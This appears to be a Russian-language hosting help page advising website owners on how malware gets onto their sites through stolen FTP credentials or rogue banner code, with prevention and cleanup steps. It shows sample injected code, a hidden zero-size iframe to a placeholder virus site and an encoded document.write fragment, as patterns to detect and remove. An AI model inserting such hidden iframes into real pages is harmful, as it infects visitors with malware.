Как защитить свой сайт и персональные данные

Как вирус мог попасть на мой сайт?

Существует множество способов, при помощи которых злоумышленники могут получить доступ к вашему сайту и изменить его содержание (удалить файлы, разместить на нем вирус и т.п.). Многие из тех, кто столкнулся с этим, полагают, что проблема на стороне хостинга. На самом деле самый распространенный способ получения доступа к вашему сайту — кража персональных данных (логина и пароля) владельца сайта при помощи вредоносного ПО.

Вирус, попавший на компьютер, с которого происходит управление сайтом, получает доступ к FTP-соединению, соединяется с сервером, где расположен сайт, и скрытно изменяет содержание его страниц, добавляя вредоносный код. Этот код может перехватывать личные данные пользователей, зашедших на сайт, или попытаться незаметно загрузить копию вируса на компьютер посетителя — тем самым заражая все большее и большее число компьютеров. Подробнее об этом и о том, как защититься от вредоносного ПО, читайте в разделе «общие вопросы».

Будьте внимательны к различным кодам, которые вы сами размещаете у себя на сайте. Часто пользователям под видом баннера (для "обмена ссылками" и т.п.), предлагается установить код, который, помимо самого баннера, содержит еще и вредоносный скрипт.

Меры безопасности.

Чтобы защитить ваш сайт и личные данные, следуйте следующим рекомендациям:

• Используйте антивирусы и фаерволы на компьютерах, с которых вы редактируете и обновляете сайт.
• Используйте последние версии браузеров
• Своевременно устанавливайте обновления баз антивирусов и обновления для используемой операционной системы и браузера.
• Не сохраняйте пароль от логина, под которым создан сайт, в FTP-клиентах.
• Храните копию всех страниц и файлов с сайта на компьютере.
• Внимательно относитесь к чужому коду, который вы устанавливаете на свой сайт (например, баннерные системы, счетчики и т.д.).

Что делать, если заражение произошло?

Рекомендуем сделать следующее:

• Проверьте антивирусом все компьютеры, с которых осуществляется редактирование сайта.
• Установите новый пароль и контрольный вопрос, который вы выбирали при регистрации на Яндексе.
• Проверьте, нет ли чужих телефонов на странице phone-passport.yandex.ru/phones и адресов на странице validator.yandex.ru

• Проверить содержание всех страниц на сайте. Для этого HTML-редакторе просмотрите содержание каждой страницы сайта и уберите все неизвестные вам коды. В первую очередь обратите внимание на теги <iframe>, <object>, <embed>, различные java-скрипты, содержащие функции unescape() или fromCharCode(), а также теги <script>, внутри которых заключены ссылки на неизвестные вам ресурсы или их содержимое "запутано", закодировано. Например:

  <iframe src="http://www.адрес-сайта-с-вирусом"  
   width="0" height="0" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></iframe> 
   

  <!-- o65 --><script  
   type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d')

Как правило, такие теги вставляются сразу после тега <body> или в конце страницы, и имеют нулевые параметры величины: width="0" height="0" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no".

Проверьте все каталоги сайта и убедитесь, что в них нет новых (неизвестных вам) HTML-страниц (и PHP-кода, несмотря на то, что PHP на Народе не поддерживается) и исполняемых файлов (COM, EXE и т.п.).

Также можно зарегистрировать сайт на нашем сервисе для вебмастеров. В нем имеются инструменты проверки страниц, которые в случае необходимости помогут вам выявить заражение. Если в дальнейшем вы заметите, что даты последнего обновления страниц сайта не соответствуют дням, в которые вы их обновляли, это означает, что вирус все еще действует и продолжает изменять контент вашего сайта.